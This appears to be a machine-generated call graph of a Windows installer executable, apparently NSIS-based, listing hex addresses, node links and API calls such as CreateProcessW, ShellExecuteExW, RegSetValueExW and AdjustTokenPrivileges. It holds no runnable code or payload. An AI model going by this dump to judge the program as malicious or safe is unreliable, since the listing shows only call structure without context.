405fdb lstrcpyA 4162 405ffd 4159->4162 4160 405fef 4161 405cf2 4 API calls 4160->4161 4161->4162 4163 406034 SetFilePointer 4162->4163 4175 405e3f WriteFile 4163->4175 4166->4145 4167->4151 4169 405e2e 4168->4169 4169->4153 4170 405cf2 lstrlenA 4169->4170 4171 405d33 lstrlenA 4170->4171 4172 405d0c lstrcmpiA 4171->4172 4173 405d3b 4171->4173 4172->4173 4174 405d2a CharNextA 4172->4174 4173->4159 4173->4160 4174->4171 4176 405e5d GlobalFree 4175->4176 4176->4153 4177 4015c1 4178 402c41 17 API calls 4177->4178 4179 4015c8 4178->4179 4180 405c17 4 API calls 4179->4180 4193 4015d1 4180->4193 4181 401631 4183 401663 4181->4183 4184 401636 4181->4184 4182 405b99 CharNextW 4182->4193 4186 401423 24 API calls 4183->4186 4204 401423 4184->4204 4192 40165b 4186->4192 4191 40164a SetCurrentDirectoryW 4191->4192 4193->4181 4193->4182 4194 401617 GetFileAttributesW 4193->4194 4196 405868 4193->4196 4199 4057ce CreateDirectoryW 4193->4199 4208 40584b CreateDirectoryW 4193->4208 4194->4193 4211 406671 GetModuleHandleA 4196->4211 4200 40581b 4199->4200 4201 40581f GetLastError 4199->4201 4200->4193 4201->4200 4202 40582e SetFileSecurityW 4201->4202 4202->4200 4203 405844 GetLastError 4202->4203 4203->4200 4205 4052ff 24 API calls 4204->4205 4206 401431 4205->4206 4207 406297 lstrcpynW 4206->4207 4207->4191 4209 40585b 4208->4209 4210 40585f GetLastError 4208->4210 4209->4193 4210->4209 4212 406697 GetProcAddress 4211->4212 4213 40668d 4211->4213 4214 40586f 4212->4214 4217 406601 GetSystemDirectoryW 4213->4217 4214->4193 4216 406693 4216->4212 4216->4214 4218 406623 wsprintfW LoadLibraryExW 4217->4218 4218->4216 5037 404344 lstrcpynW lstrlenW 5038 403945 5039 403950 5038->5039 5040 403954 5039->5040 5041 403957 GlobalAlloc 5039->5041 5041->5040 4293 401e49 4294 402c1f 17 API calls 4293->4294 4295 401e4f 4294->4295 4296 402c1f 17 API calls 4295->4296 4297 401e5b 4296->4297 4298 401e72 EnableWindow 4297->4298 4299 401e67 ShowWindow 4297->4299 4300 402ac5 4298->4300 4299->4300 5042 40264a 5043 402c1f 17 API calls 5042->5043 5044 402659 5043->5044 5045 4026a3 ReadFile 5044->5045 5046 405e10 ReadFile 5044->5046 5048 4026e3 MultiByteToWideChar 5044->5048 5049 402798 5044->5049 5051 402709 SetFilePointer MultiByteToWideChar 5044->5051 5052 4027a9 5044->5052 5054 402796 5044->5054 5055 405e6e SetFilePointer 5044->5055 5045->5044 5045->5054 5046->5044 5048->5044 5064 4061de wsprintfW 5049->5064 5051->5044 5053 4027ca SetFilePointer 5052->5053 5052->5054 5053->5054 5056 405e8a 5055->5056 5063 405ea2 5055->5063 5057 405e10 ReadFile 5056->5057 5058 405e96 5057->5058 5059 405ed3 SetFilePointer 5058->5059 5060 405eab SetFilePointer 5058->5060 5058->5063 5059->5063 5060->5059 5061 405eb6 5060->5061 5062 405e3f WriteFile 5061->5062 5062->5063 5063->5044 5064->5054 4301 6e9b2997 4302 6e9b29e7 4301->4302 4303 6e9b29a7 VirtualProtect 4301->4303 4303->4302 5068 4016cc 5069 402c41 17 API calls 5068->5069 5070 4016d2 GetFullPathNameW 5069->5070 5071 4016ec 5070->5071 5077 40170e 5070->5077 5074 4065da 2 API calls 5071->5074 5071->5077 5072 401723 GetShortPathNameW 5073 402ac5 5072->5073 5075 4016fe 5074->5075 5075->5077 5078 406297 lstrcpynW 5075->5078 5077->5072 5077->5073 5078->5077 5079 4043cd 5080 4044ff 5079->5080 5083 4043e5 5079->5083 5081 404569 5080->5081 5085 404633 5080->5085 5090 40453a GetDlgItem SendMessageW 5080->5090 5082 404573 GetDlgItem 5081->5082 5081->5085 5086 4045f4 5082->5086 5087 40458d 5082->5087 5084 40420e 18 API calls 5083->5084 5088 40444c 5084->5088 5089 404275 8 API calls 5085->5089 5086->5085 5095 404606 5086->5095 5087->5086 5094 4045b3 SendMessageW LoadCursorW SetCursor 5087->5094 5092 40420e 18 API calls 5088->5092 5093 40462e 5089->5093 5112 404230 EnableWindow 5090->5112 5097 404459 CheckDlgButton 5092->5097 5116 40467c 5094->5116 5099 40461c 5095->5099 5100 40460c SendMessageW 5095->5100 5096 404564 5113 404658 5096->5113 5110 404230 EnableWindow 5097->5110 5099->5093 5104 404622 SendMessageW 5099->5104 5100->5099 5104->5093 5105 404477 GetDlgItem 5111 404243 SendMessageW 5105->5111 5107 40448d SendMessageW 5108 4044b3 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5107->5108 5109 4044aa GetSysColor 5107->5109 5108->5093 5109->5108 5110->5105 5111->5107 5112->5096 5114 404666 5113->5114 5115 40466b SendMessageW 5113->5115 5114->5115 5115->5081 5119 4058c3 ShellExecuteExW 5116->5119 5118 4045e2 LoadCursorW SetCursor 5118->5086 5119->5118 5120 40234e 5121 402c41 17 API calls 5120->5121 5122 40235d 5121->5122 5123 402c41 17 API calls 5122->5123 5124 402366 5123->5124 5125 402c41 17 API calls 5124->5125 5126 402370 GetPrivateProfileStringW 5125->5126 5127 401b53 5128 402c41 17 API calls 5127->5128 5129 401b5a 5128->5129 5130 402c1f 17 API calls 5129->5130 5131 401b63 wsprintfW 5130->5131 5132 402ac5 5131->5132 5133 404a55 5134 404a81 5133->5134 5135 404a65 5133->5135 5137 404ab4 5134->5137 5138 404a87 SHGetPathFromIDListW 5134->5138 5144 4058e1 GetDlgItemTextW 5135->5144 5140 404a97 5138->5140 5143 404a9e SendMessageW 5138->5143 5139 404a72 SendMessageW 5139->5134 5141 40140b 2 API calls 5140->5141 5141->5143 5143->5137 5144->5139 5145 401956 5146 402c41 17 API calls 5145->5146 5147 40195d lstrlenW 5146->5147 5148 402592 5147->5148 4923 4014d7 4924 402c1f 17 API calls 4923->4924 4925 4014dd Sleep 4924->4925 4927 402ac5 4925->4927 5149 401f58 5150 402c41 17 API calls 5149->5150 5151 401f5f 5150->5151 5152 4065da 2 API calls 5151->5152 5153 401f65 5152->5153 5155 401f76 5153->5155 5156 4061de wsprintfW 5153->5156 5156->5155 5157 402259 5158 402c41 17 API calls 5157->5158 5159 40225f 5158->5159 5160 402c41 17 API calls 5159->5160 5161 402268 5160->5161 5162 402c41 17 API calls 5161->5162 5163 402271 5162->5163 5164 4065da 2 API calls 5163->5164 5165 40227a 5164->5165 5166 40228b lstrlenW lstrlenW 5165->5166 5170 40227e 5165->5170 5167 4052ff 24 API calls 5166->5167 5169 4022c9 SHFileOperationW 5167->5169 5168 4052ff 24 API calls 5171 402286 5168->5171 5169->5170 5169->5171 5170->5168 5172 6e9b2301 5173 6e9b236b 5172->5173 5174 6e9b2376 GlobalAlloc 5173->5174 5175 6e9b2395 5173->5175 5174->5173 5176 6e9b1000 5179 6e9b101b 5176->5179 5186 6e9b1516 5179->5186 5181 6e9b1020 5182 6e9b1027 GlobalAlloc 5181->5182 5183 6e9b1024 5181->5183 5182->5183 5184 6e9b153d 3 API calls 5183->5184 5185 6e9b1019 5184->5185 5188 6e9b151c 5186->5188 5187 6e9b1522 5187->5181 5188->5187 5189 6e9b152e GlobalFree 5188->5189 5189->5181 5031 40175c 5032 402c41 17 API calls 5031->5032 5033 401763 5032->5033 5034 405dbc 2 API calls 5033->5034 5035 40176a 5034->5035 5036 405dbc 2 API calls 5035->5036 5036->5035 5190 4022dd 5191 4022e4 5190->5191 5194 4022f7 5190->5194 5192 4062b9 17 API calls 5191->5192 5193 4022f1 5192->5193 5195 4058fd MessageBoxIndirectW 5193->5195 5195->5194 5196 401d5d GetDlgItem GetClientRect 5197 402c41 17 API calls 5196->5197 5198 401d8f LoadImageW SendMessageW 5197->5198 5199 402ac5 5198->5199 5200 401dad DeleteObject 5198->5200 5200->5199 5201 401563 5202 402a6b 5201->5202 5205 4061de wsprintfW 5202->5205 5204 402a70 5205->5204 4224 4023e4 4225 402c41 17 API calls 4224->4225 4226 4023f6 4225->4226 4227 402c41 17 API calls 4226->4227 4228 402400 4227->4228 4241 402cd1 4228->4241 4231 40288b 4232 402438 4234 402444 4232->4234 4245 402c1f 4232->4245 4233 402c41 17 API calls 4235 40242e lstrlenW 4233->4235 4237 402463 RegSetValueExW 4234->4237 4248 403116 4234->4248 4235->4232 4239 402479 RegCloseKey 4237->4239 4239->4231 4242 402cec 4241->4242 4268 406132 4242->4268 4246 4062b9 17 API calls 4245->4246 4247 402c34 4246->4247 4247->4234 4249 40312f 4248->4249 4250 40315d 4249->4250 4275 403324 SetFilePointer 4249->4275 4272 40330e 4250->4272 4254 4032a7 4256 4032e9 4254->4256 4261 4032ab 4254->4261 4255 40317a GetTickCount 4257 403291 4255->4257 4264 4031a6 4255->4264 4259 40330e ReadFile 4256->4259 4257->4237 4258 40330e ReadFile 4258->4264 4259->4257 4260 40330e ReadFile 4260->4261 4261->4257 4261->4260 4262 405e3f WriteFile 4261->4262 4262->4261 4263 4031fc GetTickCount 4263->4264 4264->4257 4264->4258 4264->4263 4265 403221 MulDiv wsprintfW 4264->4265 4267 405e3f WriteFile 4264->4267 4266 4052ff 24 API calls 4265->4266 4266->4264 4267->4264 4269 406141 4268->4269 4270 402410 4269->4270 4271 40614c RegCreateKeyExW 4269->4271 4270->4231 4270->4232 4270->4233 4271->4270 4273 405e10 ReadFile 4272->4273 4274 403168 4273->4274 4274->4254 4274->4255 4274->4257 4275->4250 5206 6e9b103d 5207 6e9b101b 5 API calls 5206->5207 5208 6e9b1056 5207->5208 5209 402868 5210 402c41 17 API calls 5209->5210 5211 40286f FindFirstFileW 5210->5211 5212 402897 5211->5212 5215 402882 5211->5215 5217 4061de wsprintfW 5212->5217 5214 4028a0 5218 406297 lstrcpynW 5214->5218 5217->5214 5218->5215 5219 401968 5220 402c1f 17 API calls 5219->5220 5221 40196f 5220->5221 5222 402c1f 17 API calls 5221->5222 5223 40197c 5222->5223 5224 402c41 17 API calls 5223->5224 5225 401993 lstrlenW 5224->5225 5227 4019a4 5225->5227 5226 4019e5 5227->5226 5231 406297 lstrcpynW 5227->5231 5229 4019d5 5229->5226 5230 4019da lstrlenW 5229->5230 5230->5226 5231->5229 5232 40166a 5233 402c41 17 API calls 5232->5233 5234 401670 5233->5234 5235 4065da 2 API calls 5234->5235 5236 401676 5235->5236 4304 40336c SetErrorMode GetVersion 4305 4033ab 4304->4305 4306 4033b1 4304->4306 4307 406671 5 API calls 4305->4307 4308 406601 3 API calls 4306->4308 4307->4306 4309 4033c7 lstrlenA 4308->4309 4309->4306 4310 4033d7 4309->4310 4311 406671 5 API calls 4310->4311 4312 4033de 4311->4312 4313 406671 5 API calls 4312->4313 4314 4033e5 4313->4314 4315 406671 5 API calls 4314->4315 4316 4033f1 #17 OleInitialize SHGetFileInfoW 4315->4316 4394 406297 lstrcpynW 4316->4394 4319 40343d GetCommandLineW 4395 406297 lstrcpynW 4319->4395 4321 40344f 4322 405b99 CharNextW 4321->4322 4323 403474 CharNextW 4322->4323 4324 40359e GetTempPathW 4323->4324 4334 40348d 4323->4334 4396 40333b 4324->4396 4326 4035b6 4327 403610 DeleteFileW 4326->4327 4328 4035ba GetWindowsDirectoryW lstrcatW 4326->4328 4406 402edd GetTickCount GetModuleFileNameW 4327->4406 4331 40333b 12 API calls 4328->4331 4329 405b99 CharNextW 4329->4334 4333 4035d6 4331->4333 4332 403624 4341 405b99 CharNextW 4332->4341 4376 4036c7 4332->4376 4389 4036d7 4332->4389 4333->4327 4335 4035da GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 4333->4335 4334->4329 4336 403587 4334->4336 4338 403589 4334->4338 4339 40333b 12 API calls 4335->4339 4336->4324 4490 406297 lstrcpynW 4338->4490 4340 403608 4339->4340 4340->4327 4340->4389 4358 403643 4341->4358 4345 403811 4347 403895 ExitProcess 4345->4347 4348 403819 GetCurrentProcess OpenProcessToken 4345->4348 4346 4036f1 4500 4058fd 4346->4500 4350 403831 LookupPrivilegeValueW AdjustTokenPrivileges 4348->4350 4351 403865 4348->4351 4350->4351 4357 406671 5 API calls 4351->4357 4353 4036a1 4359 405c74 18 API calls 4353->4359 4354 403707 4356 405868 5 API calls 4354->4356 4361 40370c lstrcatW 4356->4361 4365 40386c 4357->4365 4358->4353 4358->4354 4360 4036ad 4359->4360 4360->4389 4491 406297 lstrcpynW 4360->4491 4362 403728 lstrcatW lstrcmpiW 4361->4362 4363 40371d lstrcatW 4361->4363 4367 403744 4362->4367 4362->4389 4363->4362 4364 403881 ExitWindowsEx 4364->4347 4368 40388e 4364->4368 4365->4364 4365->4368 4370 403750 4367->4370 4371 403749 4367->4371 4509 40140b 4368->4509 4369 4036bc 4492 406297 lstrcpynW 4369->4492 4375 40584b 2 API calls 4370->4375 4374 4057ce 4 API calls 4371->4374 4377 40374e 4374->4377 4378 403755 SetCurrentDirectoryW 4375->4378 4434 403987 4376->4434 4377->4378 4379 403770 4378->4379 4380 403765 4378->4380 4505 406297 lstrcpynW 4379->4505 4504 406297 lstrcpynW 4380->4504 4383 4062b9 17 API calls 4384 4037af DeleteFileW 4383->4384 4385 4037bc CopyFileW 4384->4385 4391 40377e 4384->4391 4385->4391 4386 403805 4388 40605d 36 API calls 4386->4388 4387 40605d 36 API calls 4387->4391 4388->4389 4493 4038ad 4389->4493 4390 4062b9 17 API calls 4390->4391 4391->4383 4391->4386 4391->4387 4391->4390 4393 4037f0 CloseHandle 4391->4393 4506 405880 CreateProcessW 4391->4506 4393->4391 4394->4319 4395->4321 4397 40652b 5 API calls 4396->4397 4399 403347 4397->4399 4398 403351 4398->4326 4399->4398 4400 405b6c 3 API calls 4399->4400 4401 403359 4400->4401 4402 40584b 2 API calls 4401->4402 4403 40335f 4402->4403 4512 405dbc 4403->4512 4516 405d8d GetFileAttributesW CreateFileW 4406->4516 4408 402f1d 4428 402f2d 4408->4428 4517 406297 lstrcpynW 4408->4517 4410 402f43 4411 405bb8 2 API calls 4410->4411 4412 402f49 4411->4412 4518 406297 lstrcpynW 4412->4518 4414 402f54 GetFileSize 4419 402f6b 4414->4419 4431 403050 4414->4431 4416 403059 4418 403089 GlobalAlloc 4416->4418 4416->4428 4531 403324 SetFilePointer 4416->4531 4417 40330e ReadFile 4417->4419 4530 403324 SetFilePointer 4418->4530 4419->4417 4421 4030bc 4419->4421 4419->4428 4430 402e79 6 API calls 4419->4430 4419->4431 4425 402e79 6 API calls 4421->4425 4423 403072 4426 40330e ReadFile 4423->4426 4424 4030a4 4427 403116 31 API calls 4424->4427 4425->4428 4429 40307d 4426->4429 4432 4030b0 4427->4432 4428->4332 4429->4418 4429->4428 4430->4419 4519 402e79 4431->4519 4432->4428 4433 4030ed SetFilePointer 4432->4433 4433->4428 4435 406671 5 API calls 4434->4435 4436 40399b 4435->4436 4437 4039a1 GetUserDefaultUILanguage 4436->4437 4438 4039b3 4436->4438 4536 4061de wsprintfW 4437->4536 4440 406165 3 API calls 4438->4440 4442 4039e3 4440->4442 4441 4039b1 4537 403c5d 4441->4537 4443 403a02 lstrcatW 4442->4443 4444 406165 3 API calls 4442->4444 4443->4441 4444->4443 4447 405c74 18 API calls 4448 403a34 4447->4448 4449 403ac8 4448->4449 4451 406165 3 API calls 4448->4451 4450 405c74 18 API calls 4449->4450 4452 403ace 4450->4452 4460 403a66 4451->4460 4453 403ade LoadImageW 4452->4453 4454 4062b9 17 API calls 4452->4454 4455 403b84 4453->4455 4456 403b05 RegisterClassW 4453->4456 4454->4453 4458 40140b 2 API calls 4455->4458 4457 403b3b SystemParametersInfoW CreateWindowExW 4456->4457 4489 403b8e 4456->4489 4457->4455 4463 403b8a 4458->4463 4459 403a87 lstrlenW 4461 403a95 lstrcmpiW 4459->4461 4462 403abb 4459->4462 4460->4449 4460->4459 4464 405b99 CharNextW 4460->4464 4461->4462 4465 403aa5 GetFileAttributesW 4461->4465 4466 405b6c 3 API calls 4462->4466 4469 403c5d 18 API calls 4463->4469 4463->4489 4467 403a84 4464->4467 4468 403ab1 4465->4468 4470 403ac1 4466->4470 4467->4459 4468->4462 4471 405bb8 2 API calls 4468->4471 4472 403b9b 4469->4472 4545 406297 lstrcpynW 4470->4545 4471->4462 4474 403ba7 ShowWindow 4472->4474 4475 403c2a 4472->4475 4477 406601 3 API calls 4474->4477 4546 4053d2 OleInitialize 4475->4546 4479 403bbf 4477->4479 4478 403c30 4480 403c34 4478->4480 4481 403c4c 4478->4481 4482 403bcd GetClassInfoW 4479->4482 4484 406601 3 API calls 4479->4484 4488 40140b 2 API calls 4480->4488 4480->4489 4483 40140b 2 API calls 4481->4483 4485 403be1 GetClassInfoW RegisterClassW 4482->4485 4486 403bf7 DialogBoxParamW 4482->4486 4483->4489 4484->4482 4485->4486 4487 40140b 2 API calls 4486->4487 4487->4489 4488->4489 4489->4389 4490->4336 4491->4369 4492->4376 4494 4038c5 4493->4494 4495 4038b7 CloseHandle 4493->4495 4564 4038f2 4494->4564 4495->4494 4498 4059a9 67 API calls 4499 4036e0 OleUninitialize 4498->4499 4499->4345 4499->4346 4501 405912 4500->4501 4502 4036ff ExitProcess 4501->4502 4503 405926 MessageBoxIndirectW 4501->4503 4503->4502 4504->4379 4505->4391 4507 4058b3 CloseHandle 4506->4507 4508 4058bf 4506->4508 4507->4508 4508->4391 4510 401389 2 API calls 4509->4510 4511 401420 4510->4511 4511->4347 4513 405dc9 GetTickCount GetTempFileNameW 4512->4513 4514 405dff 4513->4514 4515 40336a 4513->4515 4514->4513 4514->4515 4515->4326 4516->4408 4517->4410 4518->4414 4520 402e82 4519->4520 4521 402e9a 4519->4521 4522 402e92 4520->4522 4523 402e8b DestroyWindow 4520->4523 4524 402ea2 4521->4524 4525 402eaa GetTickCount 4521->4525 4522->4416 4523->4522 4532 4066ad 4524->4532 4527 402eb8 CreateDialogParamW ShowWindow 4525->4527 4528 402edb 4525->4528 4527->4528 4528->4416 4530->4424 4531->4423 4533 4066ca PeekMessageW 4532->4533 4534 4066c0 DispatchMessageW 4533->4534 4535 402ea8 4533->4535 4534->4533 4535->4416 4536->4441 4538 403c71 4537->4538 4553 4061de wsprintfW 4538->4553 4540 403ce2 4554 403d16 4540->4554 4542 403a12 4542->4447 4543 403ce7 4543->4542 4544 4062b9 17 API calls 4543->4544 4544->4543 4545->4449 4557 40425a 4546->4557 4548 40541c 4549 40425a SendMessageW 4548->4549 4550 40542e OleUninitialize 4549->4550 4550->4478 4551 4053f5 4551->4548 4560 401389 4551->4560 4553->4540 4555 4062b9 17 API calls 4554->4555 4556 403d24 SetWindowTextW 4555->4556 4556->4543 4558 404272 4557->4558 4559 404263 SendMessageW 4557->4559 4558->4551 4559->4558 4562 401390 4560->4562 4561 4013fe 4561->4551 4562->4561 4563 4013cb MulDiv SendMessageW 4562->4563 4563->4562 4565 403900 4564->4565 4566 4038ca 4565->4566 4567 403905 FreeLibrary GlobalFree 4565->4567 4566->4498 4567->4566 4567->4567 4568 40176f 4569 402c41 17 API calls 4568->4569 4570 401776 4569->4570 4571 401796 4570->4571 4572 40179e 4570->4572 4607 406297 lstrcpynW 4571->4607 4608 406297 lstrcpynW 4572->4608 4575 4017a9 4577 405b6c 3 API calls 4575->4577 4576 40179c 4579 40652b 5 API calls 4576->4579 4578 4017af lstrcatW 4577->4578 4578->4576 4600 4017bb 4579->4600 4580 4065da 2 API calls 4580->4600 4581 405d68 2 API calls 4581->4600 4583 4017cd CompareFileTime 4583->4600 4584 40188d 4586 4052ff 24 API calls 4584->4586 4585 401864 4587 4052ff 24 API calls 4585->4587 4595 401879 4585->4595 4588 401897 4586->4588 4587->4595 4589 403116 31 API calls 4588->4589 4591 4018aa 4589->4591 4590 406297 lstrcpynW 4590->4600 4592 4018be SetFileTime 4591->4592 4594 4018d0 CloseHandle 4591->4594 4592->4594 4593 4062b9 17 API calls 4593->4600 4594->4595 4596 4018e1 4594->4596 4597 4018e6 4596->4597 4598 4018f9 4596->4598 4601 4062b9 17 API calls 4597->4601 4599 4062b9 17 API calls 4598->4599 4603 401901 4599->4603 4600->4580 4600->4581 4600->4583 4600->4584 4600->4585 4600->4590 4600->4593 4604 4058fd MessageBoxIndirectW 4600->4604 4606 405d8d GetFileAttributesW CreateFileW 4600->4606 4602 4018ee lstrcatW 4601->4602 4602->4603 4605 4058fd MessageBoxIndirectW 4603->4605 4604->4600 4605->4595 4606->4600 4607->4576 4608->4575 5237 4027ef 5238 4027f6 5237->5238 5240 402a70 5237->5240 5239 402c1f 17 API calls 5238->5239 5241 4027fd 5239->5241 5242 40280c SetFilePointer 5241->5242 5242->5240 5243 40281c 5242->5243 5245 4061de wsprintfW 5243->5245 5245->5240 5246 401a72 5247 402c1f 17 API calls 5246->5247 5248 401a7b 5247->5248 5249 402c1f 17 API calls 5248->5249 5250 401a20 5249->5250 4797 405273 4798 405283 4797->4798 4799 405297 4797->4799 4800 4052e0 4798->4800 4801 405289 4798->4801 4802 40529f IsWindowVisible 4799->4802 4809 4052bf 4799->4809 4803 4052e5 CallWindowProcW 4800->4803 4804 40425a SendMessageW 4801->4804 4802->4800 4805 4052ac 4802->4805 4806 405293 4803->4806 4804->4806 4811 404bc9 SendMessageW 4805->4811 4809->4803 4816 404c49 4809->4816 4812 404c28 SendMessageW 4811->4812 4813 404bec GetMessagePos ScreenToClient SendMessageW 4811->4813 4814 404c20 4812->4814 4813->4814 4815 404c25 4813->4815 4814->4809 4815->4812 4825 406297 lstrcpynW 4816->4825 4818 404c5c 4826 4061de wsprintfW 4818->4826 4820 404c66 4821 40140b 2 API calls 4820->4821 4822 404c6f 4821->4822 4827 406297 lstrcpynW 4822->4827 4824 404c76 4824->4800 4825->4818 4826->4820 4827->4824 5251 401cf3 5252 402c1f 17 API calls 5251->5252 5253 401cf9 IsWindow 5252->5253 5254 401a20 5253->5254 5255 401573 5256 401583 ShowWindow 5255->5256 5257 40158c 5255->5257 5256->5257 5258 402ac5 5257->5258 5259 40159a ShowWindow 5257->5259 5259->5258 5260 402df3 5261 402e05 SetTimer 5260->5261 5263 402e1e 5260->5263 5261->5263 5262 402e73 5263->5262 5264 402e38 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 5263->5264 5264->5262 5265 4014f5 SetForegroundWindow 5266 402ac5 5265->5266 5267 402576 5268 402c41 17 API calls 5267->5268 5269 40257d 5268->5269 5272 405d8d GetFileAttributesW CreateFileW 5269->5272 5271 402589 5272->5271 4928 401b77 4929 401b84 4928->4929 4930 401bc8 4928->4930 4933 401c0d 4929->4933 4936 401b9b 4929->4936 4931 401bf2 GlobalAlloc 4930->4931 4932 401bcd 4930->4932 4935 4062b9 17 API calls 4931->4935 4946 4022f7 4932->4946 4949 406297 lstrcpynW 4932->4949 4934 4062b9 17 API calls 4933->4934 4933->4946 4938 4022f1 4934->4938 4935->4933 4947 406297 lstrcpynW 4936->4947 4942 4058fd MessageBoxIndirectW 4938->4942 4940 401bdf GlobalFree 4940->4946 4941 401baa 4948 406297 lstrcpynW 4941->4948 4942->4946 4944 401bb9 4950 406297 lstrcpynW 4944->4950 4947->4941 4948->4944 4949->4940 4950->4946 4951 4024f8 4952 402c81 17 API calls 4951->4952 4953 402502 4952->4953 4954 402c1f 17 API calls 4953->4954 4955 40250b 4954->4955 4956 40288b 4955->4956 4957 402533 RegEnumValueW 4955->4957 4958 402527 RegEnumKeyW 4955->4958 4959 402548 4957->4959 4960 40254f RegCloseKey 4957->4960 4958->4960 4959->4960 4960->4956 4962 404c7b GetDlgItem GetDlgItem 4963 404ccd 7 API calls 4962->4963 5009 404ee6 4962->5009 4964 404d70 DeleteObject 4963->4964 4965 404d63 SendMessageW 4963->4965 4966 404d79 4964->4966 4965->4964 4967 404db0 4966->4967 4969 404d88 4966->4969 4972 40420e 18 API calls 4967->4972 4968 404fca 4973 405076 4968->4973 4979 40525e 4968->4979 4984 405023 SendMessageW 4968->4984 4970 4062b9 17 API calls 4969->4970 4974 404d92 SendMessageW SendMessageW 4970->4974 4971 404fab 4971->4968 4981 404fbc SendMessageW 4971->4981 4978 404dc4 4972->4978 4975 405080 SendMessageW 4973->4975 4976 405088 4973->4976 4974->4966 4975->4976 4986 4050a1 4976->4986 4987 40509a ImageList_Destroy 4976->4987 4994 4050b1 4976->4994 4977 404f46 4982 404bc9 5 API calls 4977->4982 4983 40420e 18 API calls 4978->4983 4980 404275 8 API calls 4979->4980 4985 40526c 4980->4985 4981->4968 4998 404f57 4982->4998 4999 404dd2 4983->4999 4984->4979 4989 405038 SendMessageW 4984->4989 4990 4050aa GlobalFree 4986->4990 4986->4994 4987->4986 4988 405220 4988->4979 4995 405232 ShowWindow GetDlgItem ShowWindow 4988->4995 4992 40504b 4989->4992 4990->4994 4991 404ea7 GetWindowLongW SetWindowLongW 4993 404ec0 4991->4993 5000 40505c SendMessageW 4992->5000 4996 404ec6 ShowWindow 4993->4996 4997 404ede 4993->4997 4994->4988 5007 404c49 4 API calls 4994->5007 5013 4050ec 4994->5013 4995->4979 5018 404243 SendMessageW 4996->5018 5019 404243 SendMessageW 4997->5019 4998->4971 4999->4991 5001 404ea1 4999->5001 5004 404e22 SendMessageW 4999->5004 5005 404e5e SendMessageW 4999->5005 5006 404e6f SendMessageW 4999->5006 5000->4973 5001->4991 5001->4993 5004->4999 5005->4999 5006->4999 5007->5013 5008 404ed9 5008->4979 5009->4968 5009->4971 5009->4977 5010 4051f6 InvalidateRect 5010->4988 5011 40520c 5010->5011 5020 404b84 5011->5020 5012 40511a SendMessageW 5014 405130 5012->5014 5013->5012 5013->5014 5014->5010 5015 405191 5014->5015 5017 4051a4 SendMessageW SendMessageW 5014->5017 5015->5017 5017->5014 5018->5008 5019->5009 5023 404abb 5020->5023 5022 404b99 5022->4988 5024 404ad4 5023->5024 5025 4062b9 17 API calls 5024->5025 5026 404b38 5025->5026 5027 4062b9 17 API calls 5026->5027 5028 404b43 5027->5028 5029 4062b9 17 API calls 5028->5029 5030 404b59 lstrlenW wsprintfW SetDlgItemTextW 5029->5030 5030->5022 5273 40167b 5274 402c41 17 API calls 5273->5274 5275 401682 5274->5275 5276 402c41 17 API calls 5275->5276 5277 40168b 5276->5277 5278 402c41 17 API calls 5277->5278 5279 401694 MoveFileW 5278->5279 5280 4016a7 5279->5280 5286 4016a0 5279->5286 5282 4065da 2 API calls 5280->5282 5283 402250 5280->5283 5281 401423 24 API calls 5281->5283 5284 4016b6 5282->5284 5284->5283 5285 40605d 36 API calls 5284->5285 5285->5286 5286->5281 5287 401e7d 5288 402c41 17 API calls 5287->5288 5289 401e83 5288->5289 5290 402c41 17 API calls 5289->5290 5291 401e8c 5290->5291 5292 402c41 17 API calls 5291->5292 5293 401e95 5292->5293 5294 402c41 17 API calls 5293->5294 5295 401e9e 5294->5295 5296 401423 24 API calls 5295->5296 5297 401ea5 5296->5297 5304 4058c3 ShellExecuteExW 5297->5304 5299 401ee7 5301 40288b 5299->5301 5305 406722 WaitForSingleObject 5299->5305 5302 401f01 CloseHandle 5302->5301 5304->5299 5306 40673c 5305->5306 5307 40674e GetExitCodeProcess 5306->5307 5308 4066ad 2 API calls 5306->5308 5307->5302 5309 406743 WaitForSingleObject 5308->5309 5309->5306 5310 40437e lstrlenW 5311 40439d 5310->5311 5312 40439f WideCharToMultiByte 5310->5312 5311->5312 5313 4046ff 5314 40472b 5313->5314 5315 40473c 5313->5315 5374 4058e1 GetDlgItemTextW 5314->5374 5317 404748 GetDlgItem 5315->5317 5323 4047a7 5315->5323 5319 40475c 5317->5319 5318 404736 5321 40652b 5 API calls 5318->5321 5322 404770 SetWindowTextW 5319->5322 5326 405c17 4 API calls 5319->5326 5320 40488b 5371 404a3a 5320->5371 5376 4058e1 GetDlgItemTextW 5320->5376 5321->5315 5327 40420e 18 API calls 5322->5327 5323->5320 5328 4062b9 17 API calls 5323->5328 5323->5371 5325 404275 8 API calls 5333 404a4e 5325->5333 5334 404766 5326->5334 5330 40478c 5327->5330 5331 40481b SHBrowseForFolderW 5328->5331 5329 4048bb 5332 405c74 18 API calls 5329->5332 5335 40420e 18 API calls 5330->5335 5331->5320 5336 404833 CoTaskMemFree 5331->5336 5337 4048c1 5332->5337 5334->5322 5340 405b6c 3 API calls 5334->5340 5338 40479a 5335->5338 5339 405b6c 3 API calls 5336->5339 5377 406297 lstrcpynW 5337->5377 5375 404243 SendMessageW 5338->5375 5342 404840 5339->5342 5340->5322 5345 404877 SetDlgItemTextW 5342->5345 5349 4062b9 17 API calls 5342->5349 5344 4047a0 5347 406671 5 API calls 5344->5347 5345->5320 5346 4048d8 5348 406671 5 API calls 5346->5348 5347->5323 5356 4048df 5348->5356 5350 40485f lstrcmpiW 5349->5350 5350->5345 5353 404870 lstrcatW 5350->5353 5351 404920 5378 406297 lstrcpynW 5351->5378 5353->5345 5354 404927 5355 405c17 4 API calls 5354->5355 5357 40492d GetDiskFreeSpaceW 5355->5357 5356->5351 5360 405bb8 2 API calls 5356->5360 5361 404978 5356->5361 5359 404951 MulDiv 5357->5359 5357->5361 5359->5361 5360->5356 5362 404b84 20 API calls 5361->5362 5372 4049e9 5361->5372 5363 4049d6 5362->5363 5367 4049eb SetDlgItemTextW 5363->5367 5368 4049db 5363->5368 5364 40140b 2 API calls 5365 404a0c 5364->5365 5379 404230 EnableWindow 5365->5379 5367->5372 5370 404abb 20 API calls 5368->5370 5369 404a28 5369->5371 5373 404658 SendMessageW 5369->5373 5370->5372 5371->5325 5372->5364 5372->5365 5373->5371 5374->5318 5375->5344 5376->5329 5377->5346 5378->5354 5379->5369 5380 4019ff 5381 402c41 17 API calls 5380->5381 5382 401a06 5381->5382 5383 402c41 17 API calls 5382->5383 5384 401a0f 5383->5384 5385 401a16 lstrcmpiW 5384->5385 5386 401a28 lstrcmpW 